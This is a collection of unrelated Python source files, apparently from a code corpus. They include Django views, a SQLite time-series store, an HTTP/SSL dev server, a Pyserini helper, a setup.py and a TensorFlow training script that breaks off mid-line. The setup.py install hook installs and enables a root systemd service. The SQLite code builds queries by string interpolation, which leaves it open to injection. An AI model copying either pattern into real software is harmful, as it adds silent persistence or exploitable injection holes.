{"seq_id":"555457629","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of INSPIRE.\n# Copyright (C) 2015, 2016 CERN.\n#\n# INSPIRE is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of the\n# License, or (at your option) any later version.\n#\n# INSPIRE is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n\n\"\"\"Model for WorkflowsAudit.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport os\n\nfrom flask import current_app\n\nfrom .models import WorkflowsAudit\n\n\ndef get_storage_path(suffix=\"\"):\n \"\"\"Return workflow storage path.\"\"\"\n storage_path = os.path.join(\n current_app.config.get(\n 'WORKFLOWS_STORAGEDIR',\n current_app.config.get('CFG_TMPSHAREDDIR')\n ),\n suffix\n )\n if not os.path.exists(storage_path):\n os.makedirs(storage_path)\n return storage_path\n\n\ndef log_workflows_action(action, prediction_results,\n object_id, user_id,\n source, user_action=\"\"):\n \"\"\"Log the action taken by user compared to a prediction.\"\"\"\n if prediction_results:\n score = prediction_results.get(\"max_score\") # returns 0.222113\n decision = prediction_results.get(\"decision\") # returns \"Rejected\"\n\n # Map actions to align with the prediction format\n action_map = {\n 'accept': 'Non-CORE',\n 'accept_core': 'CORE',\n 'reject': 'Rejected'\n }\n\n logging_info = {\n 'object_id': object_id,\n 'user_id': user_id,\n 'score': score,\n 'user_action': action_map.get(user_action, \"\"),\n 'decision': decision,\n 'source': source,\n 'action': action\n }\n audit = WorkflowsAudit(**logging_info)\n audit.save()\n","sub_path":"inspirehep/modules/workflows/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"588079447","text":"def cum_sum(a):\r\n cumsum = []\r\n sum_1 = 0\r\n for each in a:\r\n sum_1 += each\r\n cumsum.append(sum_1)\r\n return cumsum\r\n\r\n\r\nt = [1, 2, 3]\r\nprint(f\"original list: {t}\")\r\nprint(f\"Cumulative sum list: {cum_sum(t)}\")\r\n","sub_path":"Jan26/Assignment/Q6.py","file_name":"Q6.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"469882258","text":"import numpy as np\ndef floyd(graph):\n n = len(graph)\n for k in range(n):\n for i in range(n):\n for j in range(n):\n if graph[i][k] + graph[k][j] < graph[i][j]:\n graph[i][j] = graph[i][k] + graph[k][j]\n\n\ndata = [[0,1.1,np.inf],[np.inf,0,2],[2,35,0]]\nfloyd(data)\nprint(data)","sub_path":"two datasets/ISOMAP.py","file_name":"ISOMAP.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"282323025","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nfilename = 'StylishAA.jpg'\nimg = Image.open(filename)\nresized_img = img.resize((350, 500))\n\nroot = Tk()\n\nroot.title(\"Know To Code\")\nroot.iconbitmap('E:\Bharath\Python\PYTHONprograms\Tkinter\Calculator.ico')\n\nroot.photoimg = ImageTk.PhotoImage(resized_img)\nlabelimage = Label(root, image=root.photoimg)\nlabelimage.pack()\n\n# the below works if no resizing\n\n# my_img=ImageTk.PhotoImage(Image.open(img location))\n# lab=Label(image=my_img)\n# lab.pack()\n\n\next = Button(root, text='Exit', command=root.quit)\next.pack()\n\nroot.mainloop()\n\n'''\nfilename = 'bell.jpg'\nimg = Image.open(filename)\nresized_img = img.resize((200, 100))\n\nroot = tk.Tk()\nroot.photoimg = ImageTk.PhotoImage(resized_img)\nlabelimage = tk.Label(root, 
image=root.photoimg)\nlabelimage.pack()\n\n'''\n","sub_path":"Python Programs/Tkinter/IconsImagesExit.py","file_name":"IconsImagesExit.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"160186138","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .forms import emailForm\nfrom django.urls import reverse_lazy\nfrom django.db import models\nfrom core.models import Photos\n\n\n# Create your views here.\n\n\ndef index(request):\n \n if request.method == 'POST':\n #------------------------- CONTACT ------------------------#\n if (request.POST[\"firstname\"] != None):\n \n name = request.POST['firstname']\n sobrenome = request.POST['lastname']\n telefone = request.POST['usrtel']\n email = request.POST['email']\n servico = request.POST['service']\n conheceu = request.POST['meet']\n assunto = request.POST['subject']\n mensagem = request.POST['message']\n\n fullContent2 = 'Nome: {}\\nSobrenome: {}\\nTelefone: {}\\nEmail: {}\\nServiço: {}\\nComo conheceu: {}\\nAssunto: {}\\nMensagem: {}' .format(name, sobrenome, telefone, email, servico, conheceu, assunto, mensagem)\n \n send_mail(\n 'CONTATO CADASTRADO', # Email subject\n fullContent2, # Email body\n 'perilucas95@gmail.com', # sender email\n ['perilucas95@gmail.com'], # recipient email\n fail_silently=False,\n )\n\n return render(request, 'home.html') \n\n else:\n form = emailForm()\n #photo = Photos.objects.all()\n\n # If the page was accessed via URL, render a blank form ( , 'servicos':servico)\n return render(request, 'home.html', {'form': form})","sub_path":"monettegourmet/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"359315833","text":"# -*- coding: UTF-8 -*-\nfrom core.utils.helpers import enum\n\nPROTOCOL_LOGIN = 0x0201\nPROTOCOL_GAME = 0x020A\n\nMAP_WIDTH = 18\nMAP_HEIGHT = 14\n\nMESSAGE_TYPES = enum(\n MSG_RED=0x16,\n MSG_DARK_BLUE=0x15,\n MSG_SMALLINFO=0x14,\n MSG_INFO=0x13,\n MSG_EVENT=0x11,\n MSG_STATUS=0x12,\n MSG_ADVANCE=0x10,\n MSG_LIGHT_BLUE=0x04,\n MSG_SERVERSAY=0x09,\n)\n\nDIRECTIONS = enum(\n NORTH=0,\n EAST=1,\n SOUTH=2,\n WEST=3\n)\n\nWEAPON_TYPES = enum(\n \"NONE\", \"SWORD\", \"CLUB\", \"AXE\", \"DIST\", \"FISH\", \"MAGIC\", \"AMO\", \"SHIELD\"\n)\n","sub_path":"core/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"103371836","text":"# Make a local sqlite database to store and query temporary time series data\n\nimport os\nimport sqlite3\nfrom contextlib import closing\n\nimport pandas as pd\n\nmake_name_tbl = (\n 'CREATE TABLE TS_NAME ('\n ' id INTEGER PRIMARY KEY,'\n ' name VARCHAR(500) NOT NULL,'\n ' alias VARCHAR(500),'\n ' CONSTRAINT TS_NAME_uindex UNIQUE (name))'\n)\nmake_value_tbl = (\n 'CREATE TABLE TS_VALUE ('\n ' id INTEGER PRIMARY KEY,'\n ' nameId INTEGER,'\n ' ts TIMESTAMP NOT NULL,'\n ' value decimal(25, 10) NOT NULL,'\n ' CONSTRAINT TS_VALUE_nameId_fk'\n ' FOREIGN KEY (nameId) REFERENCES TS_NAME (id),'\n ' CONSTRAINT TS_VALUE_uindex'\n ' UNIQUE (nameId, ts))'\n)\nmake_live_tbl = (\n 'CREATE TABLE LIVE_POINT ('\n ' id INTEGER PRIMARY KEY,'\n ' name VARCHAR(500) NOT NULL,'\n ' ts TIMESTAMP NOT NULL,'\n ' value decimal(25, 10) NOT 
NULL,'\n ' CONSTRAINT LIVE_POINT_uindex'\n ' UNIQUE (name, ts))'\n)\nmake_tmp_table = (\n 'CREATE TEMPORARY TABLE INSERT_TABLE ('\n ' name VARCHAR(500) NOT NULL,'\n ' ts TIMESTAMP NOT NULL,'\n ' value decimal(25, 10) NOT NULL)'\n)\ndrop_tmp_table = 'DROP TABLE INSERT_TABLE'\ninsert_names = 'INSERT OR IGNORE INTO TS_NAME (name) SELECT DISTINCT name from INSERT_TABLE'\ninsert_values = (\n 'INSERT OR REPLACE INTO TS_VALUE (nameId, ts, value)'\n ' SELECT b.id, a.ts, a.value'\n ' FROM INSERT_TABLE a'\n ' JOIN TS_NAME b'\n ' ON a.name = b.name'\n)\ndelete_values = (\n 'DELETE FROM TS_VALUE'\n ' WHERE TS_VALUE.nameId IN'\n ' (SELECT b.id FROM INSERT_TABLE a'\n ' INNER JOIN TS_NAME b'\n ' ON a.name = b.name)'\n)\ndelete_all_names = 'DELETE FROM TS_NAME'\ndelete_all_values = 'DELETE FROM TS_VALUE'\ndelete_live = 'DELETE FROM LIVE_POINT'\n\n\nclass TsDb:\n def __init__(self, db_loc):\n self.db_loc = db_loc\n if not os.path.isfile(db_loc):\n self.__configure_new_db()\n\n def __configure_new_db(self):\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(make_name_tbl)\n curs.execute(make_value_tbl)\n curs.execute(make_live_tbl)\n\n con.commit()\n\n def delete_and_remake_entire_db(self):\n if os.path.exists(self.db_loc):\n os.remove(self.db_loc)\n\n self.__configure_new_db()\n\n def apply_alias_map(self, alias_dict):\n \"\"\"\n :param dict alias_dict: mapping from name to alias\n :rtype: None\n \"\"\"\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n for name in alias_dict:\n alias_update = (\n \"UPDATE TS_NAME\"\n f\" SET alias = '{alias_dict[name]}'\"\n f\" WHERE name = '{name}'\"\n )\n curs.execute(alias_update)\n\n con.commit()\n\n def delete_old_values(self, sd_str):\n \"\"\"\n :param str sd_str: drop all values prior to start date string\n :rtype: None\n \"\"\"\n if not isinstance(sd_str, str):\n raise ValueError('sd_str must be a date string')\n\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(f\"DELETE FROM TS_VALUE WHERE TS < '{sd_str}'\")\n\n con.commit()\n\n def insert_df(self, df, drop_existing_series=False):\n \"\"\"\n :param pd.DataFrame df: must have columns: name, ts, value\n :rtype: None\n \"\"\"\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(make_tmp_table)\n\n # Load data to temp table\n df.to_sql('INSERT_TABLE', con, index=False, if_exists='append')\n\n # Load from temp table to real table\n curs.execute(insert_names)\n if drop_existing_series:\n curs.execute(delete_values)\n\n curs.execute(insert_values)\n\n # Cleanup\n curs.execute(drop_tmp_table)\n\n con.commit()\n\n def insert_live_df(self, df):\n \"\"\"\n :param pd.DataFrame df: must have columns: name, ts, value\n :rtype: None\n \"\"\"\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(delete_live)\n df.to_sql('LIVE_POINT', con, index=False, if_exists='append')\n\n con.commit()\n\n def truncate_tables(self):\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(delete_all_names)\n curs.execute(delete_all_values)\n curs.execute(delete_live)\n\n con.commit()\n\n # TODO: add method 
clean_unused_names() to drop names that are not referenced in the value table.\n def get_names(self):\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n query = 'select id, name, alias from TS_NAME'\n df = pd.read_sql(query, con=con)\n\n return df\n\n def get_alias_map(self):\n names = self.get_names()\n if names.empty:\n return {}\n\n return names.dropna().set_index('name')['alias'].to_dict()\n\n def get_values(self, ticker_list=None, sd_str='1900-01-01', ed_str='2999-01-01'):\n sep = '\",\"'\n ticker_filter = f'b.name in (\"{sep.join(ticker_list)}\") AND' if ticker_list else ''\n query = (\n 'select a.ts, b.name, a.value from TS_VALUE a JOIN TS_NAME b on a.nameId = b.id'\n f' WHERE {ticker_filter} a.ts >= \"{sd_str}\" AND a.ts <= \"{ed_str}\"'\n )\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n df = pd.read_sql(query, con=con)\n\n return df\n\n def get_start_and_end_times(self, ticker_list):\n sep = '\",\"'\n ticker_filter = f'b.name in (\"{sep.join(ticker_list)}\")'\n query = (\n 'select b.name, ga.ts_start, ga.ts_end'\n ' from (select nameId, MIN(ts) as ts_start, MAX(ts) as ts_end'\n ' from TS_VALUE group by nameId) as ga'\n ' LEFT JOIN TS_NAME b on ga.nameId = b.id'\n f' WHERE {ticker_filter}'\n )\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n df = pd.read_sql(query, con=con)\n\n # Need to marshall derived date fields. Returned as string.\n if not df.empty:\n df['ts_start'] = pd.to_datetime(df['ts_start'], format='%Y-%m-%d %H:%M:%S')\n df['ts_end'] = pd.to_datetime(df['ts_end'], format='%Y-%m-%d %H:%M:%S')\n\n return df\n\n def get_values_with_live_point(self, ticker_list=None, sd_str='1900-01-01', ed_str='2999-01-01'):\n df = self.get_values(ticker_list, sd_str, ed_str)\n sep = '\",\"'\n ticker_filter = f'WHERE name in (\"{sep.join(ticker_list)}\")' if ticker_list else ''\n query = f'select ts, name, value from LIVE_POINT {ticker_filter}'\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n df_live = pd.read_sql(query, con=con)\n\n return df.append(df_live, ignore_index=True)","sub_path":"Caxton/JY_Completed/panormus/quant/data/bo/ts_local.py","file_name":"ts_local.py","file_ext":"py","file_size_in_byte":7625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"581828579","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom rest_framework_simplejwt import views as jwt_views\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/v1/', include('posts.urls')),\n path('api-auth/', include('rest_framework.urls')),\n path('api/token/', jwt_views.TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', jwt_views.TokenRefreshView.as_view(), name='token_refresh'),\n]\n","sub_path":"class-34/demos/blog_deploy/blog_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"475363662","text":"import http.server\nimport argparse\nimport signal\nimport threading\nimport os\nimport sys\nimport time\nimport ssl\nimport subprocess\n\n\nclass BackgroundThread(threading.Thread):\n def __init__(self, service, cleanup):\n threading.Thread.__init__(self)\n self.running = False\n self.service = service\n self.cleanup = cleanup\n\n def run(self):\n while self.running:\n self.service()\n 
self.cleanup()\n\n def start(self):\n self.running = True\n return super().start()\n\n def stop(self):\n self.running = False\n\n\nclass IWPAServer:\n def __init__(self, PORT=8000, verbose=False, wasm_stream=True, secure=False):\n self.PORT = PORT if not secure else 4443\n self.verbose = verbose\n self.background_thread = None\n\n # setup handler\n class Handler(http.server.SimpleHTTPRequestHandler):\n def log_message(self, format, *args):\n if verbose:\n super().log_message(format, *args)\n\n Handler.extensions_map[\".js\"] = \"text/javascript\"\n if wasm_stream:\n Handler.extensions_map[\".wasm\"] = \"application/wasm\"\n else:\n Handler.extensions_map[\".wasm\"] = \"text/plain\"\n\n self.httpd = http.server.ThreadingHTTPServer((\"\", self.PORT), Handler)\n self.httpd.timeout = 2\n\n if secure:\n certs = self.generate_ssl()\n self.httpd.socket = ssl.wrap_socket(\n self.httpd.socket,\n keyfile=certs[\"key\"],\n certfile=certs[\"cert\"],\n server_side=True,\n ssl_version=ssl.PROTOCOL_TLS,\n )\n\n def generate_ssl(self):\n cmd = [\n \"openssl\",\n \"req\",\n \"-x509\",\n \"-newkey\",\n \"rsa:2048\",\n \"-keyout\",\n \"key.pem\",\n \"-out\",\n \"cert.pem\",\n \"-days\",\n \"365\",\n \"-nodes\",\n \"-subj\",\n \"/CN=localhost\",\n ]\n args = (\n {\"stdout\": subprocess.PIPE, \"stderr\": subprocess.PIPE}\n if not self.verbose\n else {}\n )\n sub = subprocess.Popen(cmd, **args)\n code = sub.wait()\n if code != 0:\n sys.stderr.write(f\"Failed to generate SSL certificates{os.linesep}\")\n sys.exit(1)\n return {\"key\": \"key.pem\", \"cert\": \"cert.pem\"}\n\n def start(self):\n if self.verbose:\n print(\"serving at port\", self.PORT)\n self.background_thread = BackgroundThread(\n service=self.httpd.handle_request, cleanup=self.httpd.server_close\n )\n self.background_thread.start()\n\n def stop(self):\n if self.verbose:\n print(\"shutting down port\", self.PORT)\n if self.background_thread:\n self.background_thread.stop()\n self.background_thread.join()\n\n def isRunning(self):\n return self.background_thread.running\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"HTTP Server\")\n parser.add_argument(\n \"-p\", \"--port\", type=int, default=8000, help=\"Port number to serve at\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\", action=\"store_true\", help=\"Print debug information\"\n )\n parser.add_argument(\n \"-s\",\n \"--secure\",\n action=\"store_true\",\n default=False,\n help=\"Secure server using SSL\",\n )\n parser.add_argument(\n \"--wasm-stream\",\n action=\"store_true\",\n default=True,\n help=\"Enable streaming Web Assembly [DEFAULT]\",\n )\n parser.add_argument(\n \"--no-wasm-stream\",\n action=\"store_true\",\n default=False,\n help=\"Disable streaming Web Assembly\",\n )\n parser.add_argument(\n \"--directory\", type=str, default=\".\", help=\"Run the server at directory\"\n )\n\n args = parser.parse_args()\n\n # change to working directory\n current_dir = os.getcwd()\n if not os.path.isdir(args.directory):\n sys.stderr.write(f\"Invalid directory: '{args.directory}'\\n\")\n exit(1)\n os.chdir(args.directory)\n\n server = IWPAServer(\n PORT=args.port,\n verbose=args.verbose,\n wasm_stream=(args.wasm_stream and not args.no_wasm_stream),\n secure=args.secure,\n )\n\n try:\n server.start()\n while server.isRunning():\n time.sleep(2)\n except KeyboardInterrupt:\n server.stop()\n\n # change back\n os.chdir(current_dir)\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"484415161","text":"from django.urls import path\nfrom .views import *\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', index, name='index1.html'),\n # path('', error404, name='404.html'),\n path('index/', index, name='index.html'),\n path('login/', login, name='login'),\n path('cart/', cart, name='cart.html'),\n path('checkout/', checkout, name='checkout.html'),\n path('contact-us/', contactus, name='contact-us.html'),\n path('product-details/', productdetails, name='product-details.html'),\n path('shop/', cust, name='shop.html'),\n path('scoin/', scoin, name='scoin.html'),\n path('new/', cust, name='new.html'),\n path('bynow/', bynow, name='bynow'),\n path('purchase/', purchase, name='purchase'),\n path('validate/,', validate, name='validate'),\n path('product_add_cart/,,/',product_add_to_cart, name='add_to_cart'),\n path('offer_add_cart/,,/', offer_add_to_cart, name='add_to_cart1'),\n path('finish/,',finish_purchase,name='finish'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"reward_management_system/mypro/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409032319","text":"from distutils.core import setup\nfrom watchtowr.db import register_server\nfrom os import environ, system\nfrom setuptools.command.install import install\n\n\nclass PostInstall(install):\n\n def run(self):\n # Register the server in our database\n user_id = environ.get('HTN_USER_ID', None)\n if user_id is None:\n raise Exception('HTN_USER_ID must be set')\n server_name = environ.get('HTN_SERVER_NAME', None)\n if server_name is None:\n raise Exception('HTN_SERVER_NAME must be set')\n print('Server ID', register_server(user_id, server_name))\n # Move the sh script to the /bin folder\n with open('./watchtowr/start.sh') as infile:\n with open('/bin/appList', 'w') as outfile:\n outfile.write(infile.read())\n system('chmod +x /bin/appList')\n # Register this script as a service\n data = \"\"\"[Unit]\nDescription=Threat monitoring service developed at Hack The North 2017 using Google's Firebase and eSentire's Cymon systems.\n\n[Service]\nExecStart=/bin/bash -c \"i=0; while true; do /usr/bin/python3 -c 'from watchtowr import daemon; daemon.startDaemon($i)'; sleep 5m; done;\"\n\n[Install]\nWantedBy=multi-user.target\n \"\"\"\n with open('/etc/systemd/system/watchtowr.service', 'w') as filehandle:\n filehandle.write(data)\n # Set up daemon to run\n system('systemctl daemon-reload; systemctl enable watchtowr; systemctl start watchtowr')\n # Super\n install.run(self)\n\n\nsetup(\n name='watchtowr',\n version='0.2',\n packages=['watchtowr'],\n license='',\n url='wat.ch/towr',\n author='A team',\n author_email='a_team@hackthenorth.com',\n cmdclass={\n 'install': PostInstall\n },\n long_description='Half of our project for Hack The North 2017'\n)\n","sub_path":"WatchtowrDaemon/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325077452","text":"#\n# Pyserini: Python interface to the Anserini IR toolkit built on Lucene\n#\n# Licensed under the 
Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom copy import deepcopy\nfrom enum import Enum\nimport numpy as np\nimport pandas as pd\nfrom typing import Dict, List, Set, Tuple\n\n\nclass AggregationMethod(Enum):\n SUM = 'sum'\n\n\nclass RescoreMethod(Enum):\n RRF = 'rrf'\n SCALE = 'scale'\n\n\nclass TrecRun:\n \"\"\"Wrapper class for a trec run.\n\n Parameters\n ----------\n filepath : str\n File path of a given Trec Run.\n \"\"\"\n\n columns = ['topic', 'q0', 'docid', 'rank', 'score', 'tag']\n\n def __init__(self, filepath: str = None):\n self.run_data = pd.DataFrame(columns=TrecRun.columns)\n self.filepath = filepath\n\n if filepath is not None:\n self.read_run(self.filepath)\n\n def read_run(self, filepath: str) -> None:\n self.run_data = pd.read_csv(filepath, sep='\\s+', names=TrecRun.columns)\n\n def topics(self) -> Set[str]:\n \"\"\"\n Returns a set with all topics.\n \"\"\"\n return set(sorted(self.run_data[\"topic\"].unique()))\n\n def clone(self):\n \"\"\"\n Returns a deep copy of the current instance.\n \"\"\"\n return deepcopy(self)\n\n def save_to_txt(self, output_path: str, tag: str = None) -> None:\n if len(self.run_data) == 0:\n raise Exception('Nothing to save. TrecRun is empty')\n\n if tag is not None:\n self.run_data['tag'] = tag\n\n self.run_data = self.run_data.sort_values(by=['topic', 'score'], ascending=[True, False])\n self.run_data.to_csv(output_path, sep=' ', header=False, index=False)\n\n def get_docs_by_topic(self, topic: str, max_docs: int = None):\n docs = self.run_data[self.run_data['topic'] == topic]\n\n if max_docs is not None:\n docs = docs.head(max_docs)\n\n return docs\n\n def rescore(self, method: RescoreMethod, rrf_k: int = None, scale: float = None) -> None:\n rows = []\n\n if method == RescoreMethod.RRF:\n assert rrf_k is not None, 'Parameter \"rrf_k\" must be a valid integer.'\n\n for topic, _, docid, rank, _, tag in self.run_data.to_numpy():\n rows.append((topic, 'Q0', docid, rank, 1 / (rrf_k + rank), tag))\n\n elif method == RescoreMethod.SCALE:\n assert scale is not None, 'Parameter \"scale\" must not be none.'\n\n for topic, _, docid, rank, score, tag in self.run_data.to_numpy():\n rows.append((topic, 'Q0', docid, rank, score * scale, tag))\n else:\n raise NotImplementedError()\n\n return TrecRun.from_list(rows, self)\n\n def to_numpy(self) -> np.ndarray:\n return self.run_data.to_numpy(copy=True)\n\n @staticmethod\n def get_all_topics_from_runs(runs) -> Set[str]:\n all_topics = set()\n for run in runs:\n all_topics = all_topics.union(run.topics())\n\n return all_topics\n\n @staticmethod\n def merge(runs, aggregation: AggregationMethod, depth: int = None, k: int = None):\n \"\"\"Return a TrecRun by aggregating docid in various ways such as summing scores\n\n Parameters\n ----------\n runs : List[TrecRun]\n List of ``TrecRun`` objects.\n aggregation : AggregationMethod\n The aggregation method to use.\n depth : int\n Maximum number of results from each input run to consider. 
Set to ``None`` by default, which indicates that\n the complete list of results is considered.\n k : int\n Length of final results list. Set to ``None`` by default, which indicates that the union of all input documents\n are ranked.\n \"\"\"\n\n if len(runs) < 2:\n raise Exception('Merge requires at least 2 runs.')\n\n rows = []\n\n if aggregation == AggregationMethod.SUM:\n for topic in TrecRun.get_all_topics_from_runs(runs):\n doc_scores = dict()\n for run in runs:\n for topic, _, docid, _, score, _ in run.get_docs_by_topic(topic, depth).to_numpy():\n doc_scores[docid] = doc_scores.get(docid, 0.0) + score\n\n sorted_doc_scores = sorted(iter(doc_scores.items()), key=lambda x: (-x[1], x[0]))\n sorted_doc_scores = sorted_doc_scores if k is None else sorted_doc_scores[:k]\n\n for rank, (docid, score) in enumerate(sorted_doc_scores, start=1):\n rows.append((topic, 'Q0', docid, rank, score, 'merge_sum'))\n else:\n raise NotImplementedError()\n\n return TrecRun.from_list(rows)\n\n @staticmethod\n def from_list(rows, run=None):\n \"\"\"Return a TrecRun by populating dataframe with the provided list of tuples.\n For performance reasons, df.to_numpy() is faster than df.iterrows().\n When manipulating dataframes, we first dump to np.ndarray and construct a list of tuples with new values.\n Then use this function to convert the list of tuples to a TrecRun object.\n\n Parameters\n ----------\n rows: List[tuples]\n List of tuples in the following format: (topic, 'Q0', docid, rank, score, tag)\n\n run: TrecRun\n Set to ``None`` by default. If None, then a new instance of TrecRun will be created.\n Else, the given TrecRun will be modified.\n \"\"\"\n\n res = TrecRun() if run is None else run\n\n df = pd.DataFrame(rows)\n df.columns = TrecRun.columns\n res.run_data = df.copy()\n\n return res\n\n @staticmethod\n def from_search_results(docid_score_pair: Tuple[str, float], topic=1):\n rows = []\n\n for rank, (docid, score) in enumerate(docid_score_pair, start=1):\n rows.append((topic, 'Q0', docid, rank, score, 'searcher'))\n\n return TrecRun.from_list(rows)\n\n @staticmethod\n def concat(runs):\n \"\"\"Return a new TrecRun by concatenating a list of TrecRuns\n\n Parameters\n ----------\n runs : List[TrecRun]\n List of ``TrecRun`` objects.\n \"\"\"\n\n run = TrecRun()\n run.run_data = run.run_data.append([run.run_data for run in runs])\n return run\n","sub_path":"pyserini/trectools/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"513571553","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport RHNet as model\r\nimport cv2\r\nimport math\r\n\r\nimport utils\r\n#Define some needed parameters\r\n\r\nmomentum=0.9\r\nEPOCH=2000\r\nlr=0.00001\r\n\r\n\r\nmethod = 'mcnn'\r\ndataset_name = 'WE'\r\noutput_dir = './saved_models/'\r\ntrain_path = '/home/xu519/yurui/ProcessedData/QNRF/train/img'\r\ntrain_label_path = '/home/xu519/yurui/ProcessedData/QNRF/train/den'\r\nval_path = '/home/xu519/yurui/ProcessedData/QNRF/test/img'\r\nval_label_path = 
'/home/xu519/yurui/ProcessedData/QNRF/test/den'\r\n\r\ninput_img=tf.placeholder(tf.float32,shape=[1,None,None,1])\r\ninput_den=tf.placeholder(tf.float32,shape=[1,None,None,1])\r\n\r\npre_den=model.create(input_img)\r\nloss=tf.losses.mean_squared_error(pre_den,input_den)\r\noptimizer=tf.train.AdamOptimizer(lr)\r\ntrain_op=optimizer.minimize(loss)\r\ndefault_graph=tf.get_default_graph()\r\n\r\ninit=tf.group(tf.global_variables_initializer(),tf.local_variables_initializer())\r\nsummary=tf.summary.merge_all()\r\n\r\ndata_loader = utils.ImageDataLoader(train_path, train_label_path, shuffle=True, gt_downsample=True, pre_load=True)\r\ndata_loader_val = utils.ImageDataLoader(val_path, val_label_path, shuffle=False, gt_downsample=True, pre_load=True)\r\n\r\nconfig=tf.ConfigProto(allow_soft_placement=True)\r\ngpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\r\nconfig.gpu_options.allow_growth = True\r\n\r\nwith tf.Session(graph=default_graph,config=config) as sess:\r\n\r\n sess.run(init)\r\n saver=tf.train.Saver(max_to_keep=0)\r\n best_mae=100000\r\n bast_mse=100000\r\n writer=tf.summary.FileWriter('./exp')\r\n writer.add_graph(sess.graph)\r\n for epo in range(1,EPOCH+1):\r\n start=time.time()\r\n num=0\r\n total_loss=0\r\n for blob in data_loader:\r\n num+=1\r\n train_image_1=blob['data']\r\n\r\n train_density_1=blob['gt_density']\r\n\r\n _,pre_density,train_loss=sess.run([train_op,pre_den,loss],feed_dict={\r\n input_img:train_image_1,\r\n input_den:train_density_1,\r\n })\r\n\r\n total_loss+=train_loss\r\n if num%500==0:\r\n count_tru=np.sum(train_density_1)\r\n count_pre=np.sum(pre_density)\r\n print('truth:'+str(count_tru)+' pre:'+str(count_pre))\r\n\r\n saver.save(sess, './result/'+str(epo)+'.ckpt')\r\n\r\n time_one_epoch=time.time()-start\r\n average_loss=total_loss/num\r\n\r\n print(str(epo)+'epoch Training loss is: %.4f ; time: %.4f' 